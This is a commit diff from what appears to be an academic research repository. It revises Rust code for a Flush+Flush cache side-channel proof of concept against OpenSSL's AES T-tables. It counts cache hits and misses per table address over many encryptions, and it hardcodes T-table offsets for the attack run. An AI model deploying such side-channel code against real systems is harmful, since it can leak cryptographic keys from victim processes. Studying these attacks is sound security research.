l3-ENSL/dendrobates-t-azureus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix flush and flush in single address mode : works cleanly with prefetchers enabled

Browse Source
This commit is contained in:
GuillaumeDIDIER 2020-09-23 17:49:10 +02:00
parent 0b499abe8a
commit 61189da4ed
2 changed files with 109 additions and 64 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

156
aes-t-tables/src/lib.rs
View File

@ -66,6 +66,21 @@ pub trait SimpleCacheSideChannel {
// TODO // TODO
} }
pub struct TableAttackResult {
pub addr: *const u8,
hit: u32,
miss: u32,
}
impl TableAttackResult {
fn get(&self, cache_status: CacheStatus) -> u32 {
match cache_status {
CacheStatus::Hit => self.hit,
CacheStatus::Miss => self.miss,
}
}
}
pub trait TableCacheSideChannel { pub trait TableCacheSideChannel {
//type ChannelFatalError: Debug; //type ChannelFatalError: Debug;
/// # Safety /// # Safety
@ -82,7 +97,8 @@ pub trait TableCacheSideChannel {
&'a mut self, &'a mut self,
addresses: impl IntoIterator<Item = *const u8> + Clone, addresses: impl IntoIterator<Item = *const u8> + Clone,
victim: &'b dyn Fn(), victim: &'b dyn Fn(),
) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError>; num_iteration: u32,
) -> Result<Vec<TableAttackResult>, ChannelFatalError>;
} }
pub trait SingleAddrCacheSideChannel: Debug { pub trait SingleAddrCacheSideChannel: Debug {
@ -143,37 +159,71 @@ impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
} }
//type ChannelFatalError = T::SingleChannelFatalError; //type ChannelFatalError = T::SingleChannelFatalError;
default unsafe fn attack<'a, 'b, 'c>( default unsafe fn attack<'a, 'b>(
&'a mut self, &'a mut self,
addresses: impl IntoIterator<Item = *const u8> + Clone, addresses: impl IntoIterator<Item = *const u8> + Clone,
victim: &'c dyn Fn(), victim: &'b dyn Fn(),
) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> { num_iteration: u32,
) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
let mut result = Vec::new(); let mut result = Vec::new();
for addr in addresses { for addr in addresses {
match unsafe { self.prepare_single(addr) } { let mut hit = 0;
Ok(_) => {} let mut miss = 0;
Err(e) => match e { for iteration in 0..100 {
SideChannelError::NeedRecalibration => unimplemented!(), match unsafe { self.prepare_single(addr) } {
SideChannelError::FatalError(e) => return Err(e), Ok(_) => {}
SideChannelError::AddressNotReady(_addr) => panic!(), Err(e) => match e {
SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(), SideChannelError::NeedRecalibration => unimplemented!(),
}, SideChannelError::FatalError(e) => return Err(e),
} SideChannelError::AddressNotReady(_addr) => panic!(),
self.victim_single(victim); SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
let r = unsafe { self.test_single(addr) }; },
match r { }
Ok(status) => { self.victim_single(victim);
result.push((addr, status)); let r = unsafe { self.test_single(addr) };
match r {
Ok(status) => {}
Err(e) => match e {
SideChannelError::NeedRecalibration => panic!(),
SideChannelError::FatalError(e) => {
return Err(e);
}
_ => panic!(),
},
} }
Err(e) => match e {
SideChannelError::NeedRecalibration => panic!(),
SideChannelError::FatalError(e) => {
return Err(e);
}
_ => panic!(),
},
} }
for _iteration in 0..num_iteration {
match unsafe { self.prepare_single(addr) } {
Ok(_) => {}
Err(e) => match e {
SideChannelError::NeedRecalibration => unimplemented!(),
SideChannelError::FatalError(e) => return Err(e),
SideChannelError::AddressNotReady(_addr) => panic!(),
SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(),
},
}
self.victim_single(victim);
let r = unsafe { self.test_single(addr) };
match r {
Ok(status) => match status {
CacheStatus::Hit => {
hit += 1;
}
CacheStatus::Miss => {
miss += 1;
}
},
Err(e) => match e {
SideChannelError::NeedRecalibration => panic!(),
SideChannelError::FatalError(e) => {
return Err(e);
}
_ => panic!(),
},
}
}
result.push(TableAttackResult { addr, hit, miss });
} }
Ok(result) Ok(result)
} }
@ -204,31 +254,26 @@ impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {
} }
} }
fn table_cache_side_channel_calibrate_impl<T: MultipleAddrCacheSideChannel>( // TODO limit number of simultaneous tested address + randomise order ?
s: &mut T, /*
addresses: impl IntoIterator<Item = *const u8> + Clone,
) -> Result<(), ChannelFatalError> {
unsafe { s.calibrate(addresses) }
}
impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T { impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
unsafe fn calibrate( unsafe fn calibrate(
&mut self, &mut self,
addresses: impl IntoIterator<Item = *const u8> + Clone, addresses: impl IntoIterator<Item = *const u8> + Clone,
) -> Result<(), ChannelFatalError> { ) -> Result<(), ChannelFatalError> {
table_cache_side_channel_calibrate_impl(self, addresses) unsafe { s.calibrate(addresses) }
//self.calibrate(addresses)
} }
//type ChannelFatalError = T::MultipleChannelFatalError; //type ChannelFatalError = T::MultipleChannelFatalError;
/// # Safety /// # Safety
/// ///
/// addresses must contain only valid pointers to read. /// addresses must contain only valid pointers to read.
unsafe fn attack<'a, 'b, 'c>( unsafe fn attack<'a, 'b>(
&'a mut self, &'a mut self,
addresses: impl IntoIterator<Item = *const u8> + Clone, addresses: impl IntoIterator<Item = *const u8> + Clone,
victim: &'c dyn Fn(), victim: &'b dyn Fn(),
) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> { num_iteration: u32,
) -> Result<Vec<TableAttackResult>, ChannelFatalError> {
match unsafe { MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) } { match unsafe { MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) } {
Ok(_) => {} Ok(_) => {}
Err(e) => match e { Err(e) => match e {
@ -252,7 +297,7 @@ impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
Ok(v) => Ok(v), Ok(v) => Ok(v),
} }
} }
} }*/
pub struct AESTTableParams<'a> { pub struct AESTTableParams<'a> {
pub num_encryptions: u32, pub num_encryptions: u32,
@ -321,32 +366,19 @@ pub unsafe fn attack_t_tables_poc(
aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt); aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt);
}; };
for _ in 0..100 { let r =
let r = unsafe { side_channel.attack(addresses.clone(), &victim) }; unsafe { side_channel.attack(addresses.clone(), &victim, parameters.num_encryptions) };
match r { match r {
Ok(v) => { Ok(v) => {
for (probe, status) in v { for table_attack_result in v {
if status == Miss { *timings
*timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 0; .get_mut(&table_attack_result.addr)
} .unwrap()
} .entry(b)
.or_insert(0) += table_attack_result.get(Miss);
} }
Err(_) => panic!("Attack failed"),
}
}
for _ in 0..parameters.num_encryptions {
let r = unsafe { side_channel.attack(addresses.clone(), &victim) };
match r {
Ok(v) => {
for (probe, status) in v {
if status == Miss {
*timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 1;
}
}
}
Err(_) => panic!("Attack failed"),
} }
Err(_) => panic!("Attack failed"),
} }
} }
for probe in addresses { for probe in addresses {

17
aes-t-tables/src/main.rs
View File

@ -3,7 +3,7 @@
use aes_t_tables::SideChannelError::{AddressNotCalibrated, AddressNotReady}; use aes_t_tables::SideChannelError::{AddressNotCalibrated, AddressNotReady};
use aes_t_tables::{ use aes_t_tables::{
attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError,
MultipleAddrCacheSideChannel, SideChannelError, MultipleAddrCacheSideChannel, SideChannelError, SingleAddrCacheSideChannel,
}; };
use cache_utils::calibration::{ use cache_utils::calibration::{
get_cache_slicing, only_flush, CalibrateOperation2T, CalibrationOptions, HistParams, Verbosity, get_cache_slicing, only_flush, CalibrateOperation2T, CalibrationOptions, HistParams, Verbosity,
@ -396,7 +396,7 @@ fn main() {
openssl_path: &open_sslpath, openssl_path: &open_sslpath,
}, },
) )
}; }; /**/
let mut side_channel_ff = FlushAndFlush::new().unwrap(); let mut side_channel_ff = FlushAndFlush::new().unwrap();
unsafe { unsafe {
attack_t_tables_poc( attack_t_tables_poc(
@ -409,4 +409,17 @@ fn main() {
}, },
) )
}; };
/*
let mut side_channel_ff = SingleFlushAndFlush::new().unwrap();
unsafe {
attack_t_tables_poc(
&mut side_channel_ff,
AESTTableParams {
num_encryptions: 1 << 15,
key: [0; 32],
te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order)
openssl_path: &open_sslpath,
},
)
};*/
} }